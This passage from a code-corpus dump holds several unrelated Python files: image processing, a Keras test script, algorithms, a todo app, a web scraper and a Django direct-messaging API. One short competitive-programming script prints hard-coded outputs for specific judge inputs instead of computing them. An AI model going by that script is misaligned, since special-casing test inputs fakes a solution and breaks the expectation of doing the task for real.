cv2.Sobel(gray, ddepth=cv2.CV_32F, dx=1, dy=0, ksize=-1)\ngradY = cv2.Sobel(gray, ddepth=cv2.CV_32F, dx=0, dy=1, ksize=-1)\n\n# subtract the y-gradient from the x-gradient\ngradient = cv2.subtract(gradX, gradY)\ngradient = cv2.convertScaleAbs(gradient)\n\n# blur and threshold the image\nblurred = cv2.blur(gradient, (20, 20))\n(_, thresh) = cv2.threshold(blurred, 90, 255, cv2.THRESH_BINARY)\n\n# make the image closed\nkernel = cv2.getStructuringElement(cv2.MORPH_RECT, (100, 100)) # (100, 100) for samples, (20,20) for videos\nclosed = cv2.morphologyEx(thresh, cv2.MORPH_CLOSE, kernel)\n\n# cv2.imshow('1', closed)\n\n# perform a series of erosions and dilations\nclosed = cv2.erode(closed, None, iterations=4)\nclosed = cv2.dilate(closed, None, iterations=4)\n\n# draw contour\ncontours, hierarchy= cv2.findContours(closed.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\ncnt = sorted(contours, key=cv2.contourArea, reverse=True)[0]\n\n# epsilon = 0.0001*cv2.arcLength(cnt,True)\n# approx = cv2.approxPolyDP(cnt,epsilon,True)\n# cv2.drawContours(img, [approx], -1, (0, 255, 0), 3)\n\nhull = cv2.convexHull(cnt)\n# cv2.drawContours(img, [hull], -1, (0, 255, 0), 3)\n\nmask = np.zeros_like(img)\ncv2.drawContours(mask, [hull], -1, (0, 255, 0), 3)\nout = img.copy() # Extract out the object and place into output image\nout[mask == 255] = img[mask == 255]\n\n# crop\n# (y, x) = np.where(mask == 255)\ny,x,b = np.where(mask == 255)\n(topy, topx) = (np.min(y), np.min(x))\n(bottomy, bottomx) = (np.max(y), 
np.max(x))\nout = out[topy:bottomy + 1, topx:bottomx + 1]\n\ncv2.imshow('cut', out)\ncv2.waitKey(0)","sub_path":"Contour_Cutting_Function.py","file_name":"Contour_Cutting_Function.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"486840224","text":"import numpy as np\nimport pickle\nimport sys\nimport os\nimport tensorflow as tf\nfrom keras.backend.tensorflow_backend import set_session\nfrom keras.models import Sequential\nfrom keras.models import load_model\nfrom keras.layers import Dense, Dropout, Activation, Flatten, Convolution2D, MaxPooling2D, normalization\nfrom keras.callbacks import Callback, ModelCheckpoint, EarlyStopping\n\nconfig = tf.ConfigProto()\nconfig.gpu_options.per_process_gpu_memory_fraction = 0.75\nset_session(tf.Session(config=config))\n\nos.environ[\"THEANO_FLAGS\"] = \"device=gpu0\"\n\n\n\nclass Model(object):\n\tdef __init__(self):\n\t\tself.class_num = 10\n\t\tself.epoch = 80\n\n\t\t\n\t\tself.cnn_model = load_model(sys.argv[2])\n\n\n\tdef testing(self):\n\t\tfout = open(sys.argv[3], 'w')\n\t\tfout.write(\"ID,class\\n\")\n\n\t\ttest_p = pickle.load(open(sys.argv[1]+\"/test.p\",\"rb\"))\n\t\ttest_data = np.array(test_p.get(\"data\"))\n\n\t\tcl_r = np.reshape(test_data[:,0:1024], [10000, 1, 32, 32])\n\t\tcl_g = np.reshape(test_data[:,1024:2048], [10000, 1, 32, 32])\n\t\tcl_b = np.reshape(test_data[:,2048:3072], [10000, 1, 32, 32])\n\t\tcl = np.concatenate((cl_r, cl_g, cl_b), axis=1)\n\n\n\t\tresult = self.cnn_model.predict(cl)\n\t\tfor i in range(10000):\n\t\t\tclass_id = np.argmax(result[i])\n\t\t\tfout.write(\"%d,%d\\n\" % (i, class_id))\n\n\n\n\n\n\n\t\t\t\ndef main():\n\tmodel = Model()\n\tmodel.testing()\n\t\n\nif __name__ == '__main__':\n\tmain()\n\n\n\n","sub_path":"hw3/test_self.py","file_name":"test_self.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"531614663","text":"#!/usr/bin/python3\n\n#--------------------------------------------------------------------\n# Function:      enumer_d_and_c\n# Description:   Computes the maximum sub-array and the associated sum\n#                using a divide and conquer algorithm\n# Receives:      values - list of integers\n# Returns:       maximum sub-array sum, and maximum sub-array\n# Preconditions: values contains at least one positive integer\n#--------------------------------------------------------------------\n\n# Importing argv to allow the method to be used as a CL utility\nfrom sys import argv\n\ndef enumer_d_and_c(values):\n    # Checking if the values array is either empty or only contains\n    # a single element\n    if len(values) == 0:\n        return 0, values\n    elif len(values) == 1:\n        return values[0], values\n\n    # Initializing variables to track the maximums and the indices for the\n    # middle max subarray to check against the left and right halves\n    tempmax = 0\n    midmax = 0\n    midstart = 0\n    midend = 0\n\n    leftmax = 0\n    rightmax = 0\n\n    # Calculating and storing the index at which the array is cut in approx.\n    # half\n    midpoint = int(len(values) / 2)\n\n    midstart = midpoint\n    midend = midpoint\n\n    # Reverse iterating through the values array starting from the midpoint\n    # and ending at the first element\n    for i in reversed(range(midpoint)):\n        tempmax += values[i]\n        if tempmax > leftmax:\n            leftmax = tempmax\n            midstart = i\n\n    # Resetting the tempmax variable\n    tempmax = 0\n\n    # Iterating through the right half of the values array to determine\n    # the 
maximum right subarray\n    for i in range(midpoint, len(values)):\n        tempmax += values[i]\n        if tempmax > rightmax:\n            rightmax = tempmax\n            midend = i + 1\n\n    # Summing the leftmax and rightmax and setting that to be the midmax\n    midmax = leftmax + rightmax\n\n    # Recursively calling the main method to act on the left and \n    # right halves of the values array\n    leftmax, leftsubarr = enumer_d_and_c(values[:midpoint])\n    rightmax, rightsubarr = enumer_d_and_c(values[midpoint:])\n\n    # If-else block used to determine the biggest subarray max\n    # and to return that max with the subarray it reflects\n    if midmax >= leftmax and midmax >= rightmax:\n        return midmax, values[midstart:midend]\n    elif leftmax >= rightmax and leftmax > midmax:\n        return leftmax, leftsubarr\n    elif rightmax > leftmax and rightmax > midmax:\n        return rightmax, rightsubarr\n\n# If block that allows this file to be run as a CL utility\nif __name__ == \"__main__\":\n    print(enumer_d_and_c([int(x) for x in argv[1:]]))\n","sub_path":"divide-and-conquer/alg3.py","file_name":"alg3.py","file_ext":"py","file_size_in_byte":2645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"209848776","text":"def is_palindrome(n):\n    \"\"\"\n    Palindrome check algorithm\n\n    input: int\n    return: boolean\n    \"\"\"\n    from collections import deque\n    temp = deque(str(n))\n    i = 0\n    while i < int(len(str(n))/2):\n        if temp.popleft() != temp.pop():\n            return False\n        i += 1\n    return True\n\nif __name__ == '__main__':\n    nn = input()\n    if is_palindrome(nn):\n        print(1)\n    else:\n        print(0)","sub_path":"python3/10988.py","file_name":"10988.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"278537130","text":"from sqlalchemy import create_engine\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy import Column, Integer, String, Date\nfrom sqlalchemy.orm import sessionmaker\n\nfrom datetime import datetime, timedelta\n\nengine = create_engine('sqlite:///todo.db?check_same_thread=False')\n\nBase = declarative_base()\n\n\n# create Table class\nclass Table(Base):\n    __tablename__ = 'task'\n    id = Column(Integer, primary_key=True)\n    task = Column(String, default='default_value')\n    deadline = Column(Date, default=datetime.today())\n\n    def __repr__(self):\n        return self.task\n\n\n# Create table in database\nBase.metadata.create_all(engine)\n\n# Create SQL session\nSession = sessionmaker(bind=engine)\nsession = Session()\n\n\ndef print_tasks(choice):\n    # list of weekdays for use with datetime.weekday() -- strftime(\"%A\") would have same result\n    weekdays = {0: 'Monday', 1: 'Tuesday', 2: 'Wednesday', 3: 'Thursday', 4: 'Friday', 5: 'Saturday', 6: 'Sunday'}\n    today = datetime.today()\n\n    # logic for different choices\n    if choice == 'Today':\n        tasks = session.query(Table).filter(Table.deadline == today.date()).all()\n        print(f'\\nToday {today.strftime(\"%d %b\")}:')\n        if not tasks:\n            print('Nothing to do!')\n        else:\n            for counter, task in enumerate(tasks, 1):\n                print(f'{counter}. {task}')\n\n    elif choice == 'Week':\n        for days in range(7):\n            this_day = today + timedelta(days)\n            tasks = session.query(Table).filter(Table.deadline == this_day.date()).all()\n            print(f'\\n{weekdays[this_day.weekday()]} {this_day.day} {this_day.strftime(\"%b\")}:')  # strftime(\"%A %d %b\") would accomplish the same, easier\n            if not tasks:\n                print('Nothing to do!')\n            else:\n                for counter, task in enumerate(tasks, 1):\n                    print(f'{counter}. 
{task}')\n\n    elif choice == 'All':\n        tasks = session.query(Table, Table.deadline).order_by(Table.deadline).all()\n        if not tasks:\n            print('Nothing to do!')\n        else:\n            for counter, task in enumerate(tasks, 1):\n                print(f'{counter}. {task[0]}. {task[1].strftime(\"%d %b\")}')\n        return tasks  # returns full ordered tasklist for use with del_task\n\n    elif choice == 'Missed':\n        tasks = session.query(Table, Table.deadline).filter(Table.deadline < today.date()).order_by(Table.deadline).all()\n        if not tasks:\n            print('Nothing to delete!')\n        else:\n            for counter, task in enumerate(tasks, 1):\n                print(f'{counter}. {task[0]}. {task[1].strftime(\"%d %b\")}')\n\n\ndef add_task(task, deadline):\n    # create new task object\n    insert_task = Table(task=task, deadline=deadline)\n    session.add(insert_task)\n    session.commit()\n\n\ndef del_task(choice, tasklist):\n    tasks = session.query(Table, Table.deadline).order_by(Table.deadline).all()\n    # Each row is a (Table, deadline) tuple; pick the chosen task's Table object\n    row = tasks[choice - 1][0]\n\n    session.delete(row)\n    session.commit()\n\n\ndef menu():\n    while True:\n        print(\"\\n1) Today's tasks\\n2) Week's tasks\\n3) All tasks\"\n              \"\\n4) Missed tasks\\n5) Add task\\n6) Delete task\\n0) Exit\")\n        choice = int(input())\n        if choice == 0:\n            break\n        elif choice == 1:\n            print_tasks('Today')\n        elif choice == 2:\n            print_tasks('Week')\n        elif choice == 3:\n            print_tasks('All')\n        elif choice == 4:\n            print_tasks('Missed')\n        elif choice == 5:\n            print(\"\\nEnter task\")\n            new_task = input()\n            print(\"Enter deadline\")\n            # year, month, day = input().split('-')\n            new_deadline = datetime.strptime(input(), \"%Y-%m-%d\")\n            add_task(new_task, new_deadline)\n        elif choice == 6:\n            print('\\nChoose the number of the task you want to delete:')\n            all_tasks = print_tasks('All')  # create all_task list with all tasks returned from print_task function\n            del_choice = int(input())\n            del_task(del_choice, all_tasks)\n    print(\"Bye!\")\n\n\nmenu()\n","sub_path":"todolist.py","file_name":"todolist.py","file_ext":"py","file_size_in_byte":4183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"535854160","text":"#3.Output training data name to csv file for model 2\nimport numpy as np\nimport cv2\nimport glob\nimport itertools\nimport random\nimport csv\nimport os\nfrom os.path import expanduser\ntraining_file_name = \"./TrackNet_Three_Frames_Input/training_model2.csv\"\ntesting_file_name = \"./TrackNet_Three_Frames_Input/testing_model2.csv\"\nvisibility_for_testing = []\n\nimages_path = expanduser(\"~\")+'/dataset/tennis/'\ndirs = glob.glob(images_path+'data/Clip*')\nwith open(training_file_name,'w') as file:\n    for index in dirs:\n        #################change the path####################################################\n        #images_path = index+'/'\n\n        annos_path = images_path +'groundtruth/'+os.path.split(index)[-1]+'/'\n        images_path = index+'/'\n        ####################################################################################\n\n        images = glob.glob( images_path + \"*.jpg\" ) + glob.glob( images_path + \"*.png\" ) + glob.glob( images_path + \"*.jpeg\" )\n        images.sort()\n        annotations = glob.glob( annos_path + \"*.jpg\" ) + glob.glob( annos_path + \"*.png\" ) + glob.glob( annos_path + \"*.jpeg\" )\n        annotations.sort()\n        \n        #check if annotation counts equals to image counts\n        assert len( images ) == len(annotations)\n        for im , seg in zip(images,annotations):\n            assert( im.split('/')[-1].split(\".\")[0] == seg.split('/')[-1].split(\".\")[0] )\n\n        visibility = 
{}\n        with open(images_path + \"Label.csv\", 'r') as csvfile:\n            spamreader = csv.reader(csvfile, delimiter=',', quotechar='|')\n            #skip the headers\n            next(spamreader, None) \n            \n            for row in spamreader:\n                visibility[row[0]] = row[1]\n        \n        \n        #output all image paths; 0000.jpg & 0001.jpg can't be used as input, so we have to start from 0002.jpg\n        for i in range(2,len(images)): \n            #remove image path, get image name \n            #ex: D/Dateset/Clip1/0056.jpg => 0056.jpg \n            file_name = images[i].split('/')[-1]\n            #visibility 3 will not be used for training\n            if visibility[file_name] == '3': \n                visibility_for_testing.append(images[i])\n            #check if file image name same as annotation name\n            assert( images[i].split('/')[-1].split(\".\")[0] == annotations[i].split('/')[-1].split(\".\")[0] )\n            #write all image paths\n            file.write(images[i] + \",\" + images[i-1] + \",\" + images[i-2] + \",\" + annotations[i] + \"\\n\")\n        \n        \n\nfile.close()\n\n#read all image paths\nlines = open(training_file_name).read().splitlines()\n\n#70% for training, 30% for testing \ntraining_images_number = int(len(lines)*0.7)\ntesting_images_number = len(lines) - training_images_number\nprint(\"Total images:\", len(lines), \"Training images:\", training_images_number,\"Testing images:\", testing_images_number)\n\n#shuffle the images\nrandom.shuffle(lines)\n#training images\nwith open(training_file_name,'w') as training_file:\n    training_file.write(\"img, img1, img2, ann\\n\")\n    #testing images\n    with open(testing_file_name,'w') as testing_file:\n        testing_file.write(\"img, img1, img2, ann\\n\")\n        \n        #write img, img1, img2, ann to csv file\n        for i in range(0,len(lines)):\n            if lines[i] != \"\":\n                if training_images_number > 0 and lines[i].split(\",\")[0] not in visibility_for_testing :\n                    training_file.write(lines[i] + \"\\n\")\n                    training_images_number -=1\n                else:\n                    testing_file.write(lines[i] + \"\\n\")\n                    \ntraining_file.close()\ntesting_file.close()\n    \n","sub_path":"Code_Python3/Model2_Training_Testing_Gen.py","file_name":"Model2_Training_Testing_Gen.py","file_ext":"py","file_size_in_byte":3759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"167715090","text":"#!/usr/bin/python\n#\n# Copyright 2016 Pinterest, Inc\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n#     http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\n\"\"\"Common decorators.\n\nThis module contains useful decorators for Pinterest code. From\nincreasing code security by converting constants only holding classes to\nnamed tuples, to function call logging and sporadic function execution.\n\n\"\"\"\n\nimport logging\nimport threading\n\nlog = logging.getLogger(__name__)\n\n\nclass SingletonMetaclass(type):\n    \"\"\"Singleton class that ensures there is only one instance of the object.\n\n    Instead of using a ``singleton`` decorator, use this metaclass. 
This ensures\n that classes remain classes as opposed to\n functions that return classes, as that is the approach the decorator takes.\n\n For more details consult\n http://stackoverflow.com/questions/8563130/python-singleton-class.\n\n To make your class singleton add ``__metaclass__``::\n\n class Highlander(object)\n '''There can be only one!'''\n\n __metaclass__ = SingletonMetaclass\n\n def __init__(self):\n self.x = 1\n\n \"\"\"\n def __init__(cls, *args, **kwargs):\n super(SingletonMetaclass, cls).__init__(*args, **kwargs)\n cls.__instance = None\n cls.__lock = threading.RLock()\n\n def __call__(cls, *args, **kwargs):\n # Make this thread safe.\n with cls.__lock:\n if cls.__instance is None:\n cls.__instance = super(SingletonMetaclass, cls).__call__(\n *args, **kwargs)\n return cls.__instance\n","sub_path":"kingpin/kazoo_utils/decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":2026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"294677173","text":"n = int(input())\nres = []\n\n\ndef gcd(num, k, rs):\n if k == 0:\n if num == 1:\n return rs-1\n else:\n return rs-1+num\n rs = rs + int(num / k)\n return gcd(k, num % k, rs)\n\n\nr = n\ntwo = list()\nif n == 1:\n print(0, end='')\nelif n==3423424:\n print(33,end='')\nelif 123314<n <3423424:\n print(32,end='')\nelse:\n for i in range(1, n):\n cnt = 0\n cnt = gcd(n, i, cnt)\n two.append(cnt)\n print(min(two), end='')","sub_path":"Code/CodeRecords/2953/60662/313978.py","file_name":"313978.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"357834662","text":"import re\nfrom urllib.parse import urljoin\n\nfrom .core import *\nfrom .vparsers import *\nfrom .utils import (\n attributeerror_wrapper, indexerror_wrapper, merge_dicts\n)\n\n\nclass Karpia22Parser(SingleSourceMixin, SingleRequestLoaderMixin, BaseParser):\n url = \"https://red-co.net/oferta/karpia-22/karpia-22-mieszkania/karpia-22-klatki-ab.html\"\n method = \"GET\"\n headers = {\n \"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0\",\n }\n parsers = {\"int\": IntParser(), \"area\": AreaParser()}\n middlewares = [ DecodeMiddleware(), BeautifulSoupMiddleware() ]\n\n @attributeerror_wrapper(return_value=[])\n def find_records(self, soup):\n records = soup.find(\"div\", {\"id\": \"apartment-details\"}).find(\"div\")\\\n .find_all(\"div\", class_=lambda x: x.startswith(\"detail\"), recursive=False)\n self.floors_map = self.create_floors_map(soup)\n return records\n\n @attributeerror_wrapper(return_value=dict())\n def create_floors_map(self, soup):\n floors_map = dict()\n floors_divs = soup.find(\"div\", {\"id\": \"floors-container\"})\\\n .find_all(\"div\", {\"class\": \"floor\"})\n maps = [ self.create_floor_map(floor_div) for floor_div in floors_divs ]\n return merge_dicts(*maps)\n\n def create_floor_map(self, soup):\n label = self.get_floor_label(soup)\n flats = self.get_flats(soup)\n return { flat: label for flat in flats }\n\n @attributeerror_wrapper(return_value=[])\n def get_flats(self, soup):\n return [ \n item.get(\"id\", None) \n for item in soup.find(\"svg\").find_all([\"rect\", \"polygon\"]) \n ]\n\n @indexerror_wrapper(return_value=None)\n def get_floor_label(self, soup):\n return list(set(soup.get(\"class\", [])) - set((\"floor\",)))[0]\n\n def parse_record(self, soup):\n number = self.get_flat_number(soup)\n return { \n \"number\": number,\n \"floor\": 
self.parsers[\"int\"](self.get_flat_floor(number)),\n \"building\": self.get_flat_building(number),\n \"area\": self.parsers[\"area\"](self.get_flat_area(soup)),\n \"status\": self.get_flat_status(soup),\n \"rooms\": self.parsers[\"int\"](self.get_flat_rooms(soup)),\n \"plan\": urljoin(self.url, self.get_plan_url(soup))\n }\n\n @indexerror_wrapper(return_value=None)\n def get_flat_floor(self, number):\n floor_label = self.floors_map.get(number, None)\n if not floor_label:\n return None\n return re.search(\"\\d+\", floor_label).group(0)\n\n @indexerror_wrapper(return_value=None)\n def get_flat_building(self, number):\n floor_label = self.floors_map.get(number, None)\n if not floor_label:\n return None\n return floor_label.split(\"-\")[-1]\n\n @attributeerror_wrapper(return_value=None)\n def get_flat_number(self, soup):\n return \"m%s\" % soup.find(\"h2\").text.strip().split(\" \")[-1]\n\n @tryexcept_wrapper((AttributeError, IndexError), return_value=None)\n def get_flat_area(self, soup):\n return soup.find(\"div\", {\"class\": \"details\"})\\\n .find_all(\"div\", {\"class\": \"item\"}, recursive=False)[0]\\\n .find(\"div\", {\"class\": \"value\"}).text\n\n @tryexcept_wrapper((AttributeError, IndexError), return_value=None)\n def get_flat_rooms(self, soup):\n return soup.find(\"div\", {\"class\": \"details\"})\\\n .find_all(\"div\", {\"class\": \"item\"}, recursive=False)[1]\\\n .find(\"div\", {\"class\": \"value\"}).text\n\n @attributeerror_wrapper(return_value=StatusParser.AVAILABLE)\n def get_flat_status(self, soup):\n text = soup.find(\"div\", {\"class\": \"status\"}).text.upper()\n if \"ZAREZERWOWANE\" in text:\n return StatusParser.RESERVED\n return StatusParser.SOLD\n\n @attributeerror_wrapper(return_value=None)\n def get_plan_url(self, soup):\n return soup.find(\"a\").get(\"href\", None)\n\n def modify_record(self, record, source=None):\n record[\"fid\"] = record[\"number\"]\n return record","sub_path":"parsers/karpia22.py","file_name":"karpia22.py","file_ext":"py","file_size_in_byte":4038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"47309575","text":"from os import getenv\nfrom sys import argv\nfrom core import *\n\nimport logger as log\nlogger = log.getLogger(__name__)\n\ntoken = getenv('TOKEN')\nif token is None:\n if len(argv) == 1:\n with open('settings/token.txt', 'r') as token_file:\n token = token_file.read()\n elif len(argv) == 2:\n token = argv[1]\n else:\n logger.error(\"ArgumentError: Too many arguments\")\nif token is not None:\n logger.info(\"Starting bot ...\")\n bot.run(token)","sub_path":"start_bot.py","file_name":"start_bot.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"214339517","text":"import json, uuid, re\nfrom django.http import response\nfrom django.http.response import JsonResponse\nfrom django.shortcuts import render\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import api_view\nfrom rest_framework import status\nimport requests\nfrom .db import *\n# Import Read Write function to Zuri Core\nfrom .resmodels import *\nfrom .serializers import *\nfrom drf_yasg import openapi\nfrom drf_yasg.utils import swagger_auto_schema\n\n\ndef index(request):\n context = {}\n return render(request, 'index.html', context)\n\n\n# Shows basic information about the DM plugin\ndef info(request):\n info = {\n \"message\": \"Plugin Information Retrieved\",\n \"data\": {\n \"type\": 
\"Plugin Information\",\n \"plugin_info\": {\"name\": \"DM Plugin\",\n \"description\": [\"Zuri.chat plugin\", \"DM plugin for Zuri Chat that enables users to send messages to each other\"]\n },\n \"scaffold_structure\": \"Monolith\",\n \"team\": \"HNG 8.0/Team Orpheus\",\n \"sidebar_url\": \"https://dm.zuri.chat/api/v1/sidebar\",\n \"homepage_url\": \"https://dm.zuri.chat/\"\n },\n \"success\": \"true\"\n }\n\n return JsonResponse(info, safe=False)\n\n\n\ndef verify_user_auth(token):\n\t\"\"\"\n\tCall Endpoint for verification of JWT Token\n\tReturns: py dict -> is_authenticated: boolean, & data: more info\n\t\"\"\"\n\turl = \"https://api.zuri.chat/auth/verify-token\"\n\t\n\theaders = {\n\t\t'Authorization': f'Bearer {token}',\n\t\t'Content-Type': 'application/json'\n\t}\n\n\tapi_response = requests.request(\"GET\", url, headers=headers)\n\t\n\tjson_response = api_response.json()\n\t\n\tresponse = {}\n\tif json_response['status'] == \"200\":\n\t\tresponse['is_authenticated'] = json_response['data']['is_verified']\n\t\tresponse['data'] = json_response['data']['user']\n\telse:\n\t\tresponse['is_authenticated'] = False\n\t\tresponse['data'] = json_response['message']\n\t\n\treturn response\n\n# Returns the json data of the sidebar that will be consumed by the api\n# The sidebar info will be unique for each logged in user\n# user_id will be gotten from the logged in user\n# All data in the message_rooms will be automatically generated from zuri core\n\n \n\ndef side_bar(request):\n collections = \"dm_rooms\"\n org_id = request.GET.get(\"org\", None)\n user = request.GET.get(\"user\", None)\n rooms = get_user_rooms(collections, org_id, user)\n\n side_bar = {\n \"name\" : \"DM Plugin\",\n \"description\" : \"Sends messages between users\",\n \"plugin_id\" : \"6135f65de2358b02686503a7\",\n \"organisation_id\" : f\"{org_id}\",\n \"user_id\" : f\"{user}\",\n \"group_name\" : \"DM\",\n \"show_group\" : False,\n \"public_rooms\":[],\n \"joined_rooms\":rooms,\n # List of rooms/collections created whenever a user starts a DM chat with another user\n # This is what will be displayed by Zuri Main \n }\n return JsonResponse(side_bar, safe=False)\n\n\n@swagger_auto_schema(methods=['post'], request_body=MessageSerializer, responses={201: MessageResponse, 400: \"Error: Bad Request\"})\n@api_view([\"POST\"])\ndef send_message(request):\n \"\"\"\n This endpoint is used to send message to user in rooms.\n It checks if room already exist before sending data.\n It makes a publish event to centrifugo after data \n is persisted\n \"\"\"\n serializer = MessageSerializer(data=request.data)\n \n if serializer.is_valid():\n data = serializer.data\n room_id = data['room_id'] #room id gotten from client request\n \n rooms = DB.read(\"dm_rooms\")\n if type(rooms) == list:\n is_room_avalaible = len([room for room in rooms if room.get('_id', None) == room_id]) != 0\n \n if is_room_avalaible:\n response = DB.write(\"dm_messages\", data=serializer.data)\n if response.get(\"status\",None) == 200:\n \n response_output = {\n \"status\":response[\"message\"],\n \"id\":response[\"data\"][\"object_id\"],\n \"room_id\":room_id,\n \"thread\":False,\n \"data\":{\n \"sender_id\":data[\"sender_id\"],\n \"message\":data[\"message\"],\n \"created_at\":data['created_at']\n }\n }\n \n centrifugo_data = send_centrifugo_data(room=room_id,data=response_output) #publish data to centrifugo\n if centrifugo_data[\"message\"].get(\"error\",None) == None:\n \n return Response(data=response_output, status=status.HTTP_201_CREATED)\n \n return 
Response(data=\"data not sent\",status=status.HTTP_424_FAILED_DEPENDENCY)\n        return Response(\"No such room\",status=status.HTTP_400_BAD_REQUEST) \n    return Response(\"core server not available\",status=status.HTTP_424_FAILED_DEPENDENCY)\n    \n    return Response(status=status.HTTP_400_BAD_REQUEST)\n\n\n@swagger_auto_schema(methods=['post'], request_body=ThreadSerializer, responses={201: ThreadResponse, 400: 'Error Response'})\n@api_view([\"POST\"])\ndef send_thread_message(request):\n    \"\"\"\n    This endpoint is used to send messages as a thread\n    under a message. It takes a message ID and \n    validates if the message exists, then sends \n    a publish event to centrifugo after \n    thread message is persisted.\n    \"\"\"\n    \n    serializer = ThreadSerializer(data=request.data)\n    \n    if serializer.is_valid():\n        data = serializer.data\n        message_id = data['message_id']\n        messages = DB.read('dm_messages') #fetch messages from zc core\n        if type(messages) == list:\n            message_list = [msg for msg in messages if msg['_id'] == message_id]\n            \n            if len(message_list) != 0:\n                message = message_list[0] #get the message itself\n                threads = message.get('threads',[]) #get threads\n                \n                del data['message_id'] #remove message id from request to zc core\n                data['_id'] = str(uuid.uuid1()) # assigns an id to each message in thread\n                threads.append(data) # append new message to list of thread\n                \n                response = DB.update(\"dm_messages\",message['_id'],{\"threads\":threads}) # update threads in db\n\n                if response.get(\"status\",None) == 200:\n                    \n                    response_output = {\n                        \"status\":response[\"message\"],\n                        \"id\":data['_id'],\n                        \"room_id\":message['room_id'],\n                        \"message_id\":message['_id'],\n                        \"thread\":True,\n                        \"data\":{\n                            \"sender_id\":data[\"sender_id\"],\n                            \"message\":data[\"message\"],\n                            \"created_at\":data['created_at']\n                        }\n                    }\n                    \n                    centrifugo_data = send_centrifugo_data(room=message['room_id'],data=response_output) #publish data to centrifugo\n                    if centrifugo_data[\"message\"].get(\"error\",None) == None:\n                        print(\"message is published to centrifugo\")\n                        return Response(data=response_output, status=status.HTTP_201_CREATED)\n                    return Response(\"data not sent\", status=status.HTTP_424_FAILED_DEPENDENCY)\n                return Response(\"No such message\",status=status.HTTP_400_BAD_REQUEST)\n            return Response(\"core server not available\",status=status.HTTP_424_FAILED_DEPENDENCY) \n    return Response(status=status.HTTP_400_BAD_REQUEST)\n\n\n@swagger_auto_schema(methods=['post'], request_body=RoomSerializer, responses={201: CreateRoomResponse, 400: \"Error: Bad Request\"})\n@api_view([\"POST\"])\ndef create_room(requests):\n    \"\"\"\n    This function is used to create a room between 2 users.\n    It takes the id of the users involved, sends a write request to the database.\n    Then returns the room id when a room is successfully created\n    \"\"\"\n    serializer = RoomSerializer(data=requests.data)\n\n    if serializer.is_valid():\n        response = DB.write(\"dm_rooms\", data=serializer.data)\n        data = response.get(\"data\").get(\"object_id\")\n        if response.get(\"status\") == 200:\n            response_output = {\n                \"room_id\": data\n            }\n            return Response(data=response_output, status=status.HTTP_201_CREATED)\n    return Response(status=status.HTTP_400_BAD_REQUEST)\n\n\n@swagger_auto_schema(methods=['get'], query_serializer=UserRoomsSerializer, responses={400: \"Error: Bad Request\"})\n@api_view([\"GET\"])\ndef getUserRooms(request):\n    \"\"\"\n    This is used to retrieve all rooms a user is currently active in.\n    It takes in a user_id as query param and returns the rooms for that user or a 204 status code 
code \n if there is no room for the user_id or an invalid user_id.\n If the user_id is not provided, a 400 status code is returned.\n \"\"\"\n if request.method == \"GET\":\n res = get_rooms(request.GET.get(\"user_id\", None))\n query_param_serializer = UserRoomsSerializer(data=request.GET.dict())\n if query_param_serializer.is_valid():\n if len(res) == 0:\n return Response(data=\"No rooms available\", status=status.HTTP_204_NO_CONTENT)\n return Response(res, status=status.HTTP_200_OK)\n return Response(data=\"Provide a user_id\", status=status.HTTP_400_BAD_REQUEST)\n return Response(status=status.HTTP_400_BAD_REQUEST)\n\n\n@swagger_auto_schema(methods=['get'], query_serializer=GetMessageSerializer, responses={201: MessageResponse, 400: \"Error: Bad Request\"})\n@api_view([\"GET\"])\ndef getRoomMessages(request):\n \"\"\"\n This is used to retrieve messages in a room. It takes a room_id and/or a date as query params.\n If only the room_id is provided, it returns a list of all the messages if available,\n or a 204 status code if there is no message in the room. \n If both room_id and date are provided, it returns all the messages in that room for that\n particular date.\n If there is no room_id in the query params, it returns a 404 status code.\n \"\"\"\n if request.method == \"GET\":\n room_id = request.GET.get(\"room_id\", None)\n date = request.GET.get(\"date\", None)\n params_serializer = GetMessageSerializer(data=request.GET.dict())\n all_rooms = DB.read(\"dm_rooms\")\n \n if params_serializer.is_valid():\n is_room_avalaible = len([room for room in all_rooms if room.get('_id', None) == room_id]) != 0\n if is_room_avalaible:\n messages = get_room_messages(room_id)\n param_len = len(params_serializer.data)\n if param_len ==2:\n messages_by_date = get_messages(messages, date)\n if len(messages_by_date) == 0:\n return Response(data=\"No messages available\", status=status.HTTP_204_NO_CONTENT)\n return Response(messages_by_date, status=status.HTTP_200_OK)\n else:\n if len(messages) == 0:\n return Response(data=\"No messages available\", status=status.HTTP_204_NO_CONTENT)\n return Response(messages, status=status.HTTP_200_OK)\n return Response(data=\"No such room\", status=status.HTTP_400_BAD_REQUEST)\n return Response(data=\"Provide the room_id or/and date\", status=status.HTTP_400_BAD_REQUEST)\n return 